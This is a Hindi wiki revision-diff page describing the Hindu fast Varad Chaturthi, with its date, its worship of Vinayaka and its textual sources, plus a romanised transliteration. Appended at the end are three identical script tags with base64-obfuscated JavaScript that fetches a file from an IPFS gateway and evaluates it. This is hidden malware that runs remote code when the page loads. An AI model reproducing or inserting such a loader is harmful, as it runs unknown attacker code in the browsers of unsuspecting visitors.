Difference between revisions of "वरद चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[माघ]] [[शुक्ल पक्ष]] की [[चतुर्थी]] पर करना चाहिए। चतुर्थी को वरद (अर्थात् '[[विनायक (गणेश)|विनायक]]) की पूजा करनी चाहिए, तथा [[पंचमी]] को कुन्द पुष्पों से पूजा करनी चाहिए।  
 
*यह व्रत [[माघ]] [[शुक्ल पक्ष]] की [[चतुर्थी]] पर करना चाहिए। चतुर्थी को वरद (अर्थात् '[[विनायक (गणेश)|विनायक]]) की पूजा करनी चाहिए, तथा [[पंचमी]] को कुन्द पुष्पों से पूजा करनी चाहिए।  
*समयप्रदीप, कृत्यरत्नाकर, वर्षक्रियाकौमुदी <ref>समयप्रदीप (पाण्डुलिपि 47 बी0); कृत्यरत्नाकर (504) एवं वर्षक्रियाकौमुदी (498)</ref> का कथन है कि वरचतुर्थी केवल चतुर्थी तक सीमित है तथा पंचमी को कुन्द पुष्पों से पूजा श्रीपंचमी कहलाती है और वट का अर्थ है '[[विनायक (गणेश)|विनायक]]'।
+
*समयप्रदीप, कृत्यरत्नाकर, वर्षक्रियाकौमुदी <ref>समयप्रदीप ([[पाण्डुलिपि]] 47 बी0); कृत्यरत्नाकर (504) एवं वर्षक्रियाकौमुदी (498</ref> का कथन है कि वरचतुर्थी केवल चतुर्थी तक सीमित है तथा पंचमी को कुन्द पुष्पों से पूजा श्रीपंचमी कहलाती है और वट का अर्थ है '[[विनायक (गणेश)|विनायक]]'।
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Latest revision as of 11:08, 23 April 2013

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat magh shukl paksh ki chaturthi par karana chahie. chaturthi ko varad (arthath 'vinayak) ki pooja karani chahie, tatha panchami ko kund pushpoan se pooja karani chahie.
  • samayapradip, krityaratnakar, varshakriyakaumudi [1] ka kathan hai ki varachaturthi keval chaturthi tak simit hai tatha panchami ko kund pushpoan se pooja shripanchami kahalati hai aur vat ka arth hai 'vinayak'.

tika tippani aur sandarbh

  1. samayapradip (pandulipi 47 bi0); krityaratnakar (504) evan varshakriyakaumudi (498

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>